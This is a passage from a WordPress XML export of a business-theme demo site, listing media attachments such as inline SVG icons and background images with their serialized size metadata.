849x600.png";s:5:"width";i:849;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>down-arrow</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/typography/down-arrow/</link>
		<pubDate>Mon, 07 Sep 2020 08:24:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/down-arrow.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>480</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 08:24:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 08:24:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[down-arrow]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/down-arrow.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/down-arrow.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>add</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/typography/add/</link>
		<pubDate>Mon, 07 Sep 2020 08:50:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/add.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>481</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 08:50:32]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 08:50:32]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[add]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/add.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/add.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>testi2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/about-us/testi2/</link>
		<pubDate>Tue, 08 Sep 2020 04:12:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi2.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>518</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:12:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:12:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi2.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/testi2.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:20:"2020/09/testi2.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>testi3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/about-us/testi3/</link>
		<pubDate>Tue, 08 Sep 2020 04:12:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi3.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>519</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:12:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:12:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi3.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/testi3.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:20:"2020/09/testi3.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/about-us/bg2-about-us/</link>
		<pubDate>Tue, 08 Sep 2020 04:13:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>520</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:13:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:13:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:938;s:4:"file";s:26:"2020/09/bg2-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:26:"bg2-about-us-1-300x147.jpg";s:5:"width";i:300;s:6:"height";i:147;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"bg2-about-us-1-1024x500.jpg";s:5:"width";i:1024;s:6:"height";i:500;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"bg2-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"bg2-about-us-1-768x375.jpg";s:5:"width";i:768;s:6:"height";i:375;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"bg2-about-us-1-1536x750.jpg";s:5:"width";i:1536;s:6:"height";i:750;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"bg2-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"bg2-about-us-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"bg2-about-us-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"bg2-about-us-1-1200x938.jpg";s:5:"width";i:1200;s:6:"height";i:938;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-core-values/bg2-value/</link>
		<pubDate>Tue, 08 Sep 2020 08:26:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>549</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 08:26:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 08:26:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:686;s:4:"file";s:23:"2020/09/bg2-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"bg2-value-1-300x107.jpg";s:5:"width";i:300;s:6:"height";i:107;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"bg2-value-1-1024x366.jpg";s:5:"width";i:1024;s:6:"height";i:366;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"bg2-value-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"bg2-value-1-768x274.jpg";s:5:"width";i:768;s:6:"height";i:274;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"bg2-value-1-1536x549.jpg";s:5:"width";i:1536;s:6:"height";i:549;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"bg2-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"bg2-value-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"bg2-value-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"bg2-value-1-1200x686.jpg";s:5:"width";i:1200;s:6:"height";i:686;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/faqs/bg1-faq/</link>
		<pubDate>Tue, 08 Sep 2020 09:41:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>571</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:41:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:41:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:250;s:4:"file";s:21:"2020/09/bg1-faq.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg1-faq-1-300x39.jpg";s:5:"width";i:300;s:6:"height";i:39;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-faq-1-1024x133.jpg";s:5:"width";i:1024;s:6:"height";i:133;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-faq-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-faq-1-768x100.jpg";s:5:"width";i:768;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-faq-1-1536x200.jpg";s:5:"width";i:1536;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-faq-1-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-faq-1-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg1-faq-1-1200x250.jpg";s:5:"width";i:1200;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg1-faq-1-1200x250.jpg";s:5:"width";i:1200;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg-404</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/404-2/bg-404/</link>
		<pubDate>Wed, 09 Sep 2020 03:35:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg-404.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>599</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:35:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:35:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg-404]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>597</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg-404.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg-404.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:950;s:4:"file";s:20:"2020/09/bg-404.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg-404-1-300x148.jpg";s:5:"width";i:300;s:6:"height";i:148;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"bg-404-1-1024x507.jpg";s:5:"width";i:1024;s:6:"height";i:507;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:20:"bg-404-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"bg-404-1-768x380.jpg";s:5:"width";i:768;s:6:"height";i:380;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:21:"bg-404-1-1536x760.jpg";s:5:"width";i:1536;s:6:"height";i:760;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:20:"bg-404-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:20:"bg-404-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"bg-404-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:21:"bg-404-1-1200x950.jpg";s:5:"width";i:1200;s:6:"height";i:950;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>coming-soon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/coming-soon/coming-soon-2/</link>
		<pubDate>Wed, 09 Sep 2020 03:47:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/coming-soon.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>607</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:47:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:47:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>604</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/coming-soon.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/coming-soon.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:1080;s:4:"file";s:25:"2020/09/coming-soon.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"coming-soon-1-300x169.jpg";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"coming-soon-1-1024x576.jpg";s:5:"width";i:1024;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"coming-soon-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"coming-soon-1-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"coming-soon-1-1536x864.jpg";s:5:"width";i:1536;s:6:"height";i:864;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"coming-soon-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"coming-soon-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"coming-soon-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"coming-soon-1-1200x1080.jpg";s:5:"width";i:1200;s:6:"height";i:1080;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5: